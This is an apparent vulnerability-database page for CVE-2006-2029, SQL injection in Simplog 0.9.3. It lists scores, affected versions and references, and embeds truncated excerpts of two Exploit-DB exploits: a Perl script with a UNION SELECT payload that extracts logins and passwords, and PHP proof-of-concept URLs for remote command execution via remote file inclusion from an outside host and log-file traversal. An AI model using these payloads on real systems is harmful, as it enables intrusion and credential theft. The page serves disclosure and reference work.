CVE-2006-2029
Published 2006-04-26
Priority: P3 · 36 · medium · 6.4 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
EXPLOIT
EPSS: 2.30% (81.2th percentile)
Multiple SQL injection vulnerabilities in Jeremy Ashcraft Simplog 0.9.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) tid parameter in (a) preview.php; the (2) cid, (3) pid, and (4) eid parameters in (b) archive.php; and the (5) pid parameter in (c) comments.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| simplog | simplog | <= 0.9.3 | — |
No detection rules found.
Exploit-DB
Simplog 0.9.3 - 'tid' SQL Injection
exploitdb·2006-04-21
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=25
#Usage: simplog.pl
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-25\r\n";
print "- Simplog \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to Simplog ex: /simplog/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$spserver = $ARGV[0];
$spserver =~ s/(http:\/\/)//eg;
$sphost = "http://".$spserver;
$spdir = $ARGV[1];
$spport = "80";
$sptar = "preview.php?adm=tem&blogid=1&tid=";
$spxp = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blo
Exploit-DB
Simplog 0.9.2 - 's' Remote Command Execution
exploitdb·2006-04-11
---
#!/usr/bin/php -q -d short_open_tag=on
\r\n";
die;
}
/*
software site: http://www.simplog.org/
description: "Simplog provides an easy way for users to add blogging capabilities
to their existing websites. Simplog is written in PHP and compatible with multiple
databases. Simplog also features an RSS/Atom aggregator/reader.
Powerful, yet simple......."
i) vulnerable code in doc/index.php at lines:
...
...
nice code, isn't it? :)
poc:
http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu
(but you can submit arguments even trough cookies or POST data...)
or:
http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00
ii)
http://[target]/[path]/index.php?blogid=[sql]
http://[target]/[path]/arc
No writeups or analysis indexed.
References
http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0649.html
http://secunia.com/advisories/19764
http://securityreason.com/securityalert/799
http://securitytracker.com/id?1015976
http://www.nukedx.com/?getxpl=25
http://www.osvdb.org/24877
http://www.osvdb.org/24878
http://www.osvdb.org/24879
http://www.securityfocus.com/archive/1/431760/100/0/threaded
http://www.simplog.org/archive.php?blogid=1&pid=57
http://www.vupen.com/english/advisories/2006/1493
https://exchange.xforce.ibmcloud.com/vulnerabilities/25982